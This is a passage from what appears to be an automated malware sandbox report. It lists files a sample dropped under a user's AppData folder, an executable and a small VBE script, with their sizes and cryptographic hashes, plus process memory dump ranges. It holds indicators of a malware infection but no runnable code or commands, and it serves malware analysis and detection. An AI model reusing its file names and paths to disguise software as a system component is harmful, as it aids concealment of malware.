                                                                                                                                        606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a

                                                                                                                                        SHA512

                                                                                                                                        0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

                                                                                                                                        Filesize

                                                                                                                                        2.1MB

                                                                                                                                        MD5

                                                                                                                                        1876c5d2f6209c7ca5db2b568ec8dc47

                                                                                                                                        SHA1

                                                                                                                                        6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33

                                                                                                                                        SHA256

                                                                                                                                        e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755

                                                                                                                                        SHA512

                                                                                                                                        b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe

                                                                                                                                        Filesize

                                                                                                                                        205B

                                                                                                                                        MD5

                                                                                                                                        9a1c593488c39a17105a4ea268b40a0e

                                                                                                                                        SHA1

                                                                                                                                        90f73ef3dd6c79442f27f481957e60f0deaa3ab4

                                                                                                                                        SHA256

                                                                                                                                        9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5

                                                                                                                                        SHA512

                                                                                                                                        a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d

                                                                                                                                      • memory/976-150-0x00000000026E0000-0x0000000002736000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4048-86-0x000000001B5F0000-0x000000001B646000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4392-131-0x000000001AE50000-0x000000001AEA6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4756-0-0x00007FFA85573000-0x00007FFA85574000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4756-1-0x0000000000160000-0x000000000034C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.9MB

                                                                                                                                      • memory/4756-4-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        9.9MB

                                                                                                                                      • memory/4756-19-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        9.9MB

                                                                                                                                      • memory/4944-40-0x000000001BF80000-0x000000001BFD6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        344KB

                                                                                                                                      • memory/4944-36-0x0000000000A80000-0x0000000000CA4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.1MB

                                                                                                                                      • memory/4944-37-0x000000001B7A0000-0x000000001B7BC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        112KB

                                                                                                                                      • memory/4944-38-0x000000001BF30000-0x000000001BF80000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        320KB

                                                                                                                                      • memory/4944-39-0x000000001B7C0000-0x000000001B7D6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        88KB